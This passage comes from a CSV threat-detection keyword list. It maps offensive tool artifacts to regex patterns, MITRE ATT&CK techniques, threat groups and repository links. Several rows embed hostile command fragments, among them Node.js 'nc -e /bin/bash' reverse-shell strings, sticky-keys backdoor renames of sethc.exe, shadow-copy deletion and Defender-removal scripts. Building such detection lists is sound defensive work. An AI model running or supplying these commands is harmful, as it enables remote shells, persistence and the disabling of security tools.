applications on Windows OS.","T1070 - T1564","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/PinoyWH1Z/AoratosWin","1","1","N/A","N/A","N/A","2","120","16","2022-09-04T09:15:35Z","2022-09-04T09:04:35Z","57111" "*RemoverofDefenderContextMenu.reg*",".{0,1000}RemoverofDefenderContextMenu\.reg.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","1","N/A","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","57112" "*RemoveSecHealthApp.ps1*",".{0,1000}RemoveSecHealthApp\.ps1.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense 
Evasion","https://github.com/ionuttbara/windows-defender-remover","1","1","N/A","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","57113" "*RemoveSecurityandMaintenance.reg*",".{0,1000}RemoveSecurityandMaintenance\.reg.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","1","N/A","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","57114" "*RemoveShellAssociation.reg*",".{0,1000}RemoveShellAssociation\.reg.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","1","N/A","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","57115" "*RemoveSignatureUpdates.reg*",".{0,1000}RemoveSignatureUpdates\.reg.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","1","N/A","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","57116" "*Remove-SQLC2Agent*",".{0,1000}Remove\-SQLC2Agent.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. 
PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","1","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","57117" "*Remove-SQLC2Command*",".{0,1000}Remove\-SQLC2Command.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","1","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","57118" "*Remove-TemplateLurker -EventName *",".{0,1000}Remove\-TemplateLurker\s\-EventName\s.{0,1000}","offensive_tool_keyword","Powerlurk","PowerLurk is a PowerShell toolset for building malicious WMI Event Subscriptions","T1084 - T1059.001 - T1546.003 - T1053.005","TA0003 - TA0005 - TA0002 - TA0006","N/A","N/A","Persistence","https://github.com/Sw4mpf0x/PowerLurk","1","0","N/A","N/A","10","4","384","72","2016-07-25T22:19:22Z","2016-07-13T20:07:25Z","57119" "*Remove-Update.ps1*",".{0,1000}Remove\-Update\.ps1.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage 
of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","57120" "*Remove-VolumeShadowCopy*",".{0,1000}Remove\-VolumeShadowCopy.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","57121" "*RemoveWindowsDefenderFirewallRules.reg*",".{0,1000}RemoveWindowsDefenderFirewallRules\.reg.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","1","N/A","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","57122" 
"*RemoveWindowsWebThreat.reg*",".{0,1000}RemoveWindowsWebThreat\.reg.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","1","N/A","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","57123" "*ren sethc.exe sethcbad.exe*",".{0,1000}ren\ssethc\.exe\ssethcbad\.exe.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","N/A","9","1","13","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z","57127" "*ren sethcold.exe sethc.exe*",".{0,1000}ren\ssethcold\.exe\ssethc\.exe.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","N/A","9","1","13","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z","57130" "*ren sethcold.exe sethc.exe*",".{0,1000}ren\ssethcold\.exe\ssethc\.exe.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","N/A","9","1","13","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z","57131" "*renameMachine.py -current-name * -new-name * -dc-ip * *:*",".{0,1000}renameMachine\.py\s\-current\-name\s.{0,1000}\s\-new\-name\s.{0,1000}\s\-dc\-ip\s.{0,1000}\s.{0,1000}\:.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds 
of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","57133" "*renameMachine.py -current-name * -new-name*",".{0,1000}renameMachine\.py\s\-current\-name\s.{0,1000}\s\-new\-name.{0,1000}","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1078.001 - T1078.002 - T1059.003 - T1059.001 - T1053.005 - T1021.001 - T1003.001 - T1003.002 - T1003.004 - T1001.001 ","TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation tool","https://www.thehacker.recipes/ad/movement/kerberos/samaccountname-spoofing","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","57134" "*replace_key_iv_shellcode*",".{0,1000}replace_key_iv_shellcode.{0,1000}","offensive_tool_keyword","cobaltstrike","A protective and Low Level Shellcode Loader that defeats modern EDR systems.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - 
CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/cribdragg3r/Alaris","1","1","N/A","N/A","10","10","903","142","2024-03-20T15:50:57Z","2020-02-22T15:42:37Z","57135" "*replace_video_fake_plugin*",".{0,1000}replace_video_fake_plugin.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","1","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","57136" "*Replacing /etc/dhcp/dhcpd.conf with no route push config*",".{0,1000}Replacing\s\/etc\/dhcp\/dhcpd\.conf\swith\sno\sroute\spush\sconfig.{0,1000}","offensive_tool_keyword","TunnelVision","TunnelVision uses DHCP option 121 to manipulate routing tables and decloak VPN traffic","T1557 - T1498.003","TA0009 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/leviathansecurity/TunnelVision","1","0","#linux","N/A","9","2","132","17","2024-05-08T19:40:13Z","2024-03-11T22:24:56Z","57137" "*repository.su/blackarch/*/os/*",".{0,1000}repository\.su\/blackarch\/.{0,1000}\/os\/.{0,1000}","offensive_tool_keyword","blackarch","offensive distribution - url used by the OS for updates","T1071.001 - T1105","TA0009","N/A","N/A","Exploitation OS","https://github.com/BlackArch/blackarch","1","1","N/A","N/A","10","10","2969","595","2025-04-22T06:14:44Z","2012-08-16T16:03:43Z","57138" 
"*RePRGM/Nimperiments*",".{0,1000}RePRGM\/Nimperiments.{0,1000}","offensive_tool_keyword","EvilLsassTwin","Dumping lsass","T1003 - T1560.001 - T1022 - T1027.002","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","1","N/A","N/A","10","2","151","18","2024-12-23T05:06:31Z","2022-09-13T12:42:13Z","57139" "*RequestAADRefreshToken.exe*",".{0,1000}RequestAADRefreshToken\.exe.{0,1000}","offensive_tool_keyword","Maestro","Maestro is a post-exploitation tool that simplifies interaction with Intune/EntraID from a C2 agent on a user's workstation bypassing the need for user password knowledge - token manipulation or Azure authentication processes","T1550.004 - T1078 - T1087 - T1071 - T1102","TA0006 - TA0003 - TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Mayyhem/Maestro","1","0","N/A","behavior detections opportunities here https://posts.specterops.io/requesting-azure-ad-request-tokens-on-azure-ad-joined-machines-for-browser-sso-2b0409caad30","9","4","333","33","2025-02-11T23:02:00Z","2024-01-15T18:45:50Z","57140" "*RequestAsPython-PowerShell.py*",".{0,1000}RequestAsPython\-PowerShell\.py.{0,1000}","offensive_tool_keyword","burpsuite","A collection of scripts to extend Burp Suite. the request gets transformed to its equivalent in Python requests. Python urllib2. 
and PowerShell Invoke-WebRequest.","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","Black Basta","Discovery","https://github.com/laconicwolf/burp-extensions","1","1","N/A","network exploitation tool","N/A","2","142","31","2019-04-08T00:49:45Z","2018-03-23T16:05:01Z","57141" "*Requesting meterpreter payload from https://*",".{0,1000}Requesting\smeterpreter\spayload\sfrom\shttps\:\/\/.{0,1000}","offensive_tool_keyword","Python-Rootkit","full undetectable python RAT which can bypass almost all antivirus and open a backdoor inside any windows machine which will establish a reverse https Metasploit connection to your listening machine","T1100 - T1027 - T1219 - T1560.001 - T1021.005","TA0005 - TA0003 - TA0011","N/A","FIN11 - FIN7 - Silence group - MuddyWater - FIN6 - GCMAN - Turla","C2","https://github.com/0xIslamTaha/Python-Rootkit","1","0","N/A","N/A","10","10","606","145","2024-10-29T16:56:39Z","2016-06-09T10:49:54Z","57142" "*Requesting S4U2Proxy*",".{0,1000}Requesting\sS4U2Proxy.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","57143" "*Requesting S4U2self*",".{0,1000}Requesting\sS4U2self.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","57144" "*require 'evil-proxy'*",".{0,1000}require\s\'evil\-proxy\'.{0,1000}","offensive_tool_keyword","evil-proxy","A ruby http/https proxy to do EVIL things","T1557 - T1110.001 - T1563.001","TA0006 - TA0001 - 
TA0009 - TA0040","N/A","N/A","Phishing","https://github.com/bbtfr/evil-proxy","1","0","N/A","N/A","9","2","172","96","2023-10-30T07:49:40Z","2015-07-30T01:54:40Z","57145" "*require 'evil-proxy/async'*",".{0,1000}require\s\'evil\-proxy\/async\'.{0,1000}","offensive_tool_keyword","evil-proxy","A ruby http/https proxy to do EVIL things","T1557 - T1110.001 - T1563.001","TA0006 - TA0001 - TA0009 - TA0040","N/A","N/A","Phishing","https://github.com/bbtfr/evil-proxy","1","0","N/A","N/A","9","2","172","96","2023-10-30T07:49:40Z","2015-07-30T01:54:40Z","57146" "*require 'evil-proxy/store'*",".{0,1000}require\s\'evil\-proxy\/store\'.{0,1000}","offensive_tool_keyword","evil-proxy","A ruby http/https proxy to do EVIL things","T1557 - T1110.001 - T1563.001","TA0006 - TA0001 - TA0009 - TA0040","N/A","N/A","Phishing","https://github.com/bbtfr/evil-proxy","1","0","N/A","N/A","9","2","172","96","2023-10-30T07:49:40Z","2015-07-30T01:54:40Z","57147" "*require('child_process').exec('nc -e ""/bin/bash"" *",".{0,1000}require\(\'child_process\'\)\.exec\(\'nc\s\-e\s\""\/bin\/bash\""\s.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","#linux","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","57148" "*require('child_process').exec('nc -e ""/bin/sh"" *",".{0,1000}require\(\'child_process\'\)\.exec\(\'nc\s\-e\s\""\/bin\/sh\""\s.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","#linux","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","57149" "*require('child_process').exec('nc -e ""bash"" 
*",".{0,1000}require\(\'child_process\'\)\.exec\(\'nc\s\-e\s\""bash\""\s.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","#linux","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","57150" "*require('child_process').exec('nc -e ""cmd"" *",".{0,1000}require\(\'child_process\'\)\.exec\(\'nc\s\-e\s\""cmd\""\s.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","57151" "*require('child_process').exec('nc -e ""powershell"" *",".{0,1000}require\(\'child_process\'\)\.exec\(\'nc\s\-e\s\""powershell\""\s.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","57152" "*require('child_process').exec('nc -e ""pwsh"" *",".{0,1000}require\(\'child_process\'\)\.exec\(\'nc\s\-e\s\""pwsh\""\s.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","57153" "*require('child_process').exec('nc -e ""zsh"" *",".{0,1000}require\(\'child_process\'\)\.exec\(\'nc\s\-e\s\""zsh\""\s.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - 
T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","57154" "*require('child_process').exec('nc -e sh *",".{0,1000}require\(\'child_process\'\)\.exec\(\'nc\s\-e\ssh\s.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","57155" "*Reset-PSAmsiScanCache *",".{0,1000}Reset\-PSAmsiScanCache\s.{0,1000}","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","0","N/A","N/A","7","4","390","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z","57156" "*reshacker_setup.exe*",".{0,1000}reshacker_setup\.exe.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","57157" "*resocks generate*",".{0,1000}resocks\sgenerate.{0,1000}","offensive_tool_keyword","resocks","resocks is a reverse/back-connect SOCKS5 proxy tunnel that can be used to route traffic through a system that can't be directly accessed","T1090.003 - T1090 - T1571","TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/RedTeamPentesting/resocks","1","0","N/A","N/A","8","10","437","33","2023-09-19T10:43:29Z","2023-05-02T08:42:15Z","57158" "*resocks 
listen*",".{0,1000}resocks\slisten.{0,1000}","offensive_tool_keyword","resocks","resocks is a reverse/back-connect SOCKS5 proxy tunnel that can be used to route traffic through a system that can't be directly accessed","T1090.003 - T1090 - T1571","TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/RedTeamPentesting/resocks","1","0","N/A","N/A","8","10","437","33","2023-09-19T10:43:29Z","2023-05-02T08:42:15Z","57159" "*resocks/proxyrelay*",".{0,1000}resocks\/proxyrelay.{0,1000}","offensive_tool_keyword","resocks","resocks is a reverse/back-connect SOCKS5 proxy tunnel that can be used to route traffic through a system that can't be directly accessed","T1090.003 - T1090 - T1571","TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/RedTeamPentesting/resocks","1","1","N/A","N/A","8","10","437","33","2023-09-19T10:43:29Z","2023-05-02T08:42:15Z","57160" "*resocks_Windows_x86_64.zip*",".{0,1000}resocks_Windows_x86_64\.zip.{0,1000}","offensive_tool_keyword","resocks","resocks is a reverse/back-connect SOCKS5 proxy tunnel that can be used to route traffic through a system that can't be directly accessed","T1090.003 - T1090 - T1571","TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/RedTeamPentesting/resocks","1","1","N/A","N/A","8","10","437","33","2023-09-19T10:43:29Z","2023-05-02T08:42:15Z","57161" "*ResourceDevelopment_EstablishAccounts_RGPerson.py*",".{0,1000}ResourceDevelopment_EstablishAccounts_RGPerson\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black 
Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","57164" "*ResourceDevelopment_Server_DNSLog.py*",".{0,1000}ResourceDevelopment_Server_DNSLog\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","57165" "*ResourceDevelopment_Server_LDAPServer.py*",".{0,1000}ResourceDevelopment_Server_LDAPServer\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","57166" "*ResourceDevelopment_WebServices_TencentAPIGateway.py*",".{0,1000}ResourceDevelopment_WebServices_TencentAPIGateway\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black 
Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","57167" "*Resources/Design/NinjaStyle.ps1*",".{0,1000}Resources\/Design\/NinjaStyle\.ps1.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","57168" "*Resources/drone.dll*",".{0,1000}Resources\/drone\.dll.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","57169" "*Resources\donut.exe*",".{0,1000}Resources\\donut\.exe.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","0","N/A","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","57170" "*responder * --lm*",".{0,1000}responder\s.{0,1000}\s\-\-lm.{0,1000}","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011 - T1040","TA0011 - TA0006 - TA0007","N/A","Lazarus Group - APT28 - FANCY BEAR - EMBER BEAR","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","0","N/A","N/A","N/A","10","4656","1722","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z","57171" "*responder -i *",".{0,1000}responder\s\-i\s.{0,1000}","offensive_tool_keyword","responder","LLMNR. 
NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011 - T1040","TA0011 - TA0006 - TA0007","N/A","Lazarus Group - APT28 - FANCY BEAR - EMBER BEAR","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","0","N/A","N/A","N/A","10","4656","1722","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z","57172" "*responder --interface*",".{0,1000}responder\s\-\-interface.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","57173" "*Responder.py -I *",".{0,1000}Responder\.py\s\-I\s.{0,1000}","offensive_tool_keyword","NetNTLMtoSilverTicket","Obtaining NetNTLMv1 Challenge/Response authentication - cracking those to NTLM Hashes and using that NTLM Hash to sign a Kerberos Silver ticket.","T1110.001 - T1558.003 - T1558.004","TA0006 - TA0008 - TA0002","N/A","N/A","Credential Access","https://github.com/NotMedic/NetNTLMtoSilverTicket","1","0","N/A","N/A","10","9","842","113","2021-07-26T15:16:20Z","2019-01-14T15:32:27Z","57174" "*Responder.py*",".{0,1000}Responder\.py.{0,1000}","offensive_tool_keyword","responder","LLMNR. 
